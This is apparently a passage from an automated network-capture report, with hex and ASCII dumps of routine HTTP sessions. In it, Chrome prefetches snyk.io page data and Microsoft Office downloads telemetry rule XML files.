                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 4c 65 61 64 65 72 73 20 68 61 6e 64 62 6f 6f 6b 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 6c 70 2f 73 65 63 75 72 69 6e 67 2d 61 69 2d 67 65 6e 65 72 61 74 65 64 2d 63 6f 64 65 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 68 61 6e 64 62 6f 6f 6b 22 7d 7d 7d 5d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 72 4e 5a 30 50 55 49 78 49 30 47 4e 63 6c 41 61 30 69 58 42 69 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000"__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Leaders handbook","description":null,"url":"/lp/securing-ai-generated-code/","appearance":{"navItem":{"icon":"handbook"}}}]}}]}},{"sys":{"id":"4rNZ0PUIxI0GNclAa0iXBi","__typename"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC12INData Raw: 6f 72 6d 22 2c 22 75 72 6c 22 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: orm","url"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC3731INData Raw: 30 30 30 30 30 45 38 37 0d 0a 3a 22 2f 70 6c 61 74 66 6f 72 6d 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 65 41 6b 48 59 36 51 7a 56 50 5a 66 35 66 50 30 6c 32 35 4e 6f 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 50 72 69 63 69 6e 67 22 2c 22 75 72 6c 22 3a 22 2f 70 6c 61 6e 73 2f 22 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 4d 77 68 31 33 42 57 50 73 35 6f 4e 76 51 62 75 4f 41 72 69 30 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 46 6f 6f 74 65 72 43 61 74 65 67 6f 72 79 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000E87:"/platform/"},{"sys":{"id":"4eAkHY6QzVPZf5fP0l25No","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Pricing","url":"/plans/"}]}},{"sys":{"id":"4Mwh13BWPs5oNvQbuOAri0","__typename":"Sys"},"__typename":"NavigationFooterCategory"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              86192.168.2.54984723.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC647OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/deepcode-ai.json?slug=platform&slug=deepcode-ai HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC632INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"si2iupeg0t19ob"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/deepcode-ai.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::tvkvz-1729799350789-7e979ff044c9
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:10 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799350.1f610c4
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC15752INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 35 53 75 49 56 74 77 38 39 57 41 38 6b 45 6e 5a 6e 34 69 51 57 38 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 30 37 54 31 33 3a 31 37 3a 33 37 2e 31 34 33 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 31 30 2d 30 38 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5SuIVtw89WA8kEnZn4iQW8","type":"Entry","createdAt":"2023-06-07T13:17:37.143Z","updatedAt":"2024-10-08T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC15971INData Raw: 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 38 36 31 34 32 34 36 34 2f 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 75 69 2d 73 70 6f 74 2d 73 6e 79 6b 2d 64 65 65 70 63 6f 64 65 2d 73 65 61 72 63 68 2d 72 75 6c 65 73 2e 70 6e 67 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 33 31 35 36 36 35 2c 22 77 69 64 74 68 22 3a 31 32 33 38 2c 22 66 6f 72 6d 61 74 22 3a 22 70 6e 67 22 2c 22 68 65 69 67 68 74 22 3a 37 39 32 2c 22 76 65 72 73 69 6f 6e 22 3a 31 36 38 36 31 34 32 34 36 34 2c 22 64 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74 61 22 3a 5b 5d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 75 69 2d 73 70 6f 74 2d 73 6e 79
                                                                                                                                                                                                                                                                                                              Data Ascii: m/snyk/image/upload/v1686142464/illustration-ui-spot-snyk-deepcode-search-rules.png","tags":[],"type":"upload","bytes":315665,"width":1238,"format":"png","height":792,"version":1686142464,"duration":null,"metadata":[],"public_id":"illustration-ui-spot-sny
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 61 6e 63 65 22 3a 7b 22 66 6f 6f 74 65 72 43 74 61 22 3a 7b 7d 7d 7d 7d 7d 7d 2c 22 6d 65 6e 75 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 22 2c 22 63 75 73 74 6f 6d 4c 6f 67 6f 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 4c 6f 67 6f 4c 69 6e 6b 22 3a 6e 75 6c 6c 2c 22 61 63 74 69 6f 6e 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 41 63 74 69 6f 6e 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 45 62 67 72 6d 6d 67 55 56 49 72 55 32 76 50 65 67 33 4d 4d 35 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 41 74 6f 6d 42
                                                                                                                                                                                                                                                                                                              Data Ascii: ance":{"footerCta":{}}}}}},"menu":{"__typename":"NavigationPrimary","customLogo":null,"customLogoLink":null,"actions":{"__typename":"NavigationPrimaryActionsCollection","items":[{"sys":{"id":"1EbgrmmgUVIrU2vPeg3MM5","__typename":"Sys"},"__typename":"AtomB
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC1057INData Raw: 64 22 3a 22 37 6b 35 51 66 6e 68 36 71 4a 39 35 6b 65 31 41 46 39 55 5a 38 65 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 73 70 6f 74 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 22 3a 66 61 6c 73 65 2c 22 74 69 74 6c 65 54 65 78 74 22 3a 6e 75 6c 6c 2c 22 73 75 62 6d 65 6e 75 4c 69 6e 6b 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 49 74 65 6d 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 35 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: d":"7k5Qfnh6qJ95ke1AF9UZ8e","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":null,"spotlightFirstItem":false,"titleText":null,"submenuLinks":{"__typename":"NavigationDropdownMenuColumnRowItemsCollection","items":[{"sys":{"id":"5k
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC10084INData Raw: 30 30 30 30 32 37 35 38 0d 0a 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 6b 4e 50 62 33 57 4c 6b 79 37 64 6f 71 35 41 43 76 50 5a 63 39 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 22 2c 22 72 6f 77 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 79 48 34 42 6f 62 71 54 6f 6d 4c 30 35 70 77 67 67 32 62 32 49 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 00002758}}]}},{"sys":{"id":"1kNPb3WLky7doq5ACvPZc9","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumn","rows":{"__typename":"NavigationDropdownMenuColumnRowsCollection","items":[{"sys":{"id":"3yH4BobqTomL05pwgg2b2I","__typename":"Sys"},"__t
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              87192.168.2.54985213.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:10 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 0fe0dd21-c01e-0066-771c-26a1ec000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194910Z-16849878b788tnsxzb2smucwdc000000083g00000000rp8g
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              88192.168.2.54985113.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC498INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 82d491bf-801e-0048-1e3d-26f3fb000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194910Z-r197bdfb6b4kzncf21qcaynxz800000002eg000000008srw
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L2_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              89192.168.2.54985413.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:10 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 43a53b7c-f01e-005d-24fc-2413ba000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194910Z-15b8d89586fxdh48qknu9dqk2g00000003b000000000reue
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              90192.168.2.54984923.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC608OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/integrations.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC503INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /en-US/integrations
                                                                                                                                                                                                                                                                                                              X-Middleware-Skip: 1
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::8vmwv-1729799351052-2b4ef8baa6ea
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 3
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799351.1f61112
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC3INData Raw: 7b 7d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: {}


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              91192.168.2.54984823.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC412OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/plans.json?slug=plans HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"v73oqi948j2hg7"
                                                                                                                                                                                                                                                                                                              Server: Vercel
